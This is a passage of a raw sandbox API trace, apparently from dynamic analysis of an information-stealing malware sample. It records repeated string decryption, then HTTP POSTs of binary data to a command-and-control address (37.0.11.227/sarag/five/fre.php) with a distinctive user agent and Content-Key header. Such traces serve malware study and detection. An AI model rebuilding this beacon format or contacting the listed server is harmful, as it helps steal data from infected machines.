[0264.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0264.696] GetProcessHeap () returned 0x690000 [0264.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0264.696] GetProcessHeap () returned 0x690000 [0264.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0264.696] GetProcessHeap () returned 0x690000 [0264.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0264.697] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1564) returned 0x7b4 [0264.701] Sleep (dwMilliseconds=0xea60) [0264.702] GetProcessHeap () returned 0x690000 [0264.702] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0264.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.704] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.710] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0264.716] GetProcessHeap () returned 0x690000 [0264.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0264.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.717] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0264.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.718] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.719] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.719] GetProcessHeap () returned 0x690000 [0264.719] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0264.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.723] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0264.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.724] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0264.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.725] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0264.725] GetProcessHeap () returned 0x690000 [0264.725] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0264.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.726] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0264.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.727] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0264.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.728] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0264.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.729] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0264.729] GetProcessHeap () returned 0x690000 [0264.729] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0264.729] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0264.729] GetProcessHeap () returned 0x690000 [0264.729] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0264.729] GetProcessHeap () returned 0x690000 [0264.730] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0264.730] GetProcessHeap () returned 0x690000 [0264.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0264.738] GetProcessHeap () returned 0x690000 [0264.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0264.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.739] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.748] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0264.756] GetProcessHeap () returned 0x690000 [0264.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0264.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.758] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0264.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.759] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.770] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.771] GetProcessHeap () returned 0x690000 [0264.771] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0264.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.772] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0264.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.787] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0264.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.788] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0264.788] GetProcessHeap () returned 0x690000 [0264.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0264.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.789] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0264.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.790] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0264.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.791] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0264.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.794] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0264.794] GetProcessHeap () returned 0x690000 [0264.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0264.795] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0264.795] GetProcessHeap () returned 0x690000 [0264.795] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0264.795] socket (af=2, type=1, protocol=6) returned 0x7b8 [0264.795] connect (s=0x7b8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0264.829] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0264.829] GetProcessHeap () returned 0x690000 [0264.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0264.829] GetProcessHeap () returned 0x690000 [0264.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0264.829] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0264.830] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0264.830] GetProcessHeap () returned 0x690000 [0264.830] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0264.830] GetProcessHeap () returned 0x690000 [0264.831] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0264.831] GetProcessHeap () returned 0x690000 [0264.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0264.831] GetProcessHeap () returned 0x690000 [0264.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0264.832] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0264.832] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0264.832] GetProcessHeap () returned 0x690000 [0264.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0264.832] GetProcessHeap () returned 0x690000 [0264.833] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0264.833] send (s=0x7b8, buf=0x6ad508*, len=242, flags=0) returned 242 [0264.834] send (s=0x7b8, buf=0x6aba40*, len=159, flags=0) returned 159 [0264.834] GetProcessHeap () returned 0x690000 [0264.834] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0264.834] recv (in: s=0x7b8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0264.906] GetProcessHeap () returned 0x690000 [0264.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0264.906] GetProcessHeap () returned 0x690000 [0264.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0264.906] GetProcessHeap () returned 0x690000 [0264.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0264.907] GetProcessHeap () returned 0x690000 [0264.908] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0264.908] closesocket (s=0x7b8) returned 0 [0264.908] GetProcessHeap () returned 0x690000 [0264.908] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0264.908] GetProcessHeap () returned 0x690000 [0264.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0264.909] GetProcessHeap () returned 0x690000 [0264.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0264.909] GetProcessHeap () returned 0x690000 [0264.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0264.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1568) returned 0x7b8 [0264.912] Sleep (dwMilliseconds=0xea60) [0264.913] GetProcessHeap () returned 0x690000 [0264.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0264.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.915] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.925] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0264.936] GetProcessHeap () returned 0x690000 [0264.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0264.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.937] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0264.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.938] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.943] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.943] GetProcessHeap () returned 0x690000 [0264.943] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0264.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.944] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0264.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.946] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0264.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0264.947] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0264.947] GetProcessHeap () returned 0x690000 [0264.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0264.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.980] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0264.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.982] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0264.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.983] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0264.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.984] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0264.989] GetProcessHeap () returned 0x690000 [0264.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0264.997] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0264.998] GetProcessHeap () returned 0x690000 [0264.998] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0264.999] GetProcessHeap () returned 0x690000 [0264.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0264.999] GetProcessHeap () returned 0x690000 [0264.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0264.999] GetProcessHeap () returned 0x690000 [0264.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0265.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.002] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.008] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0265.016] GetProcessHeap () returned 0x690000 [0265.016] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0265.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.017] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0265.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.018] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.019] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.019] GetProcessHeap () returned 0x690000 [0265.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0265.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.020] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0265.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.021] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0265.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.025] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0265.025] GetProcessHeap () returned 0x690000 [0265.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0265.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.026] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0265.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.026] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0265.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.027] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0265.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.028] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0265.028] GetProcessHeap () returned 0x690000 [0265.028] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0265.028] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0265.028] GetProcessHeap () returned 0x690000 [0265.028] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0265.029] socket (af=2, type=1, protocol=6) returned 0x7bc [0265.029] connect (s=0x7bc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0265.055] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0265.055] GetProcessHeap () returned 0x690000 [0265.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0265.055] GetProcessHeap () returned 0x690000 [0265.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0265.056] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0265.057] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0265.057] GetProcessHeap () returned 0x690000 [0265.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0265.057] GetProcessHeap () returned 0x690000 [0265.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0265.058] GetProcessHeap () returned 0x690000 [0265.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0265.058] GetProcessHeap () returned 0x690000 [0265.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0265.059] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0265.060] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0265.060] GetProcessHeap () returned 0x690000 [0265.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0265.061] GetProcessHeap () returned 0x690000 [0265.061] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0265.061] send (s=0x7bc, buf=0x6ad508*, len=242, flags=0) returned 242 [0265.062] send (s=0x7bc, buf=0x6aba40*, len=159, flags=0) returned 159 [0265.062] GetProcessHeap () returned 0x690000 [0265.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0265.062] recv (in: s=0x7bc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0265.135] GetProcessHeap () returned 0x690000 [0265.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0265.136] GetProcessHeap () returned 0x690000 [0265.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0265.137] GetProcessHeap () returned 0x690000 [0265.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0265.138] GetProcessHeap () returned 0x690000 [0265.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0265.138] closesocket (s=0x7bc) returned 0 [0265.139] GetProcessHeap () returned 0x690000 [0265.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0265.139] GetProcessHeap () returned 0x690000 [0265.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0265.139] GetProcessHeap () returned 0x690000 [0265.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0265.140] GetProcessHeap () returned 0x690000 [0265.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0265.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1570) returned 0x7bc [0265.153] Sleep (dwMilliseconds=0xea60) [0265.156] GetProcessHeap () returned 0x690000 [0265.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0265.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.157] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 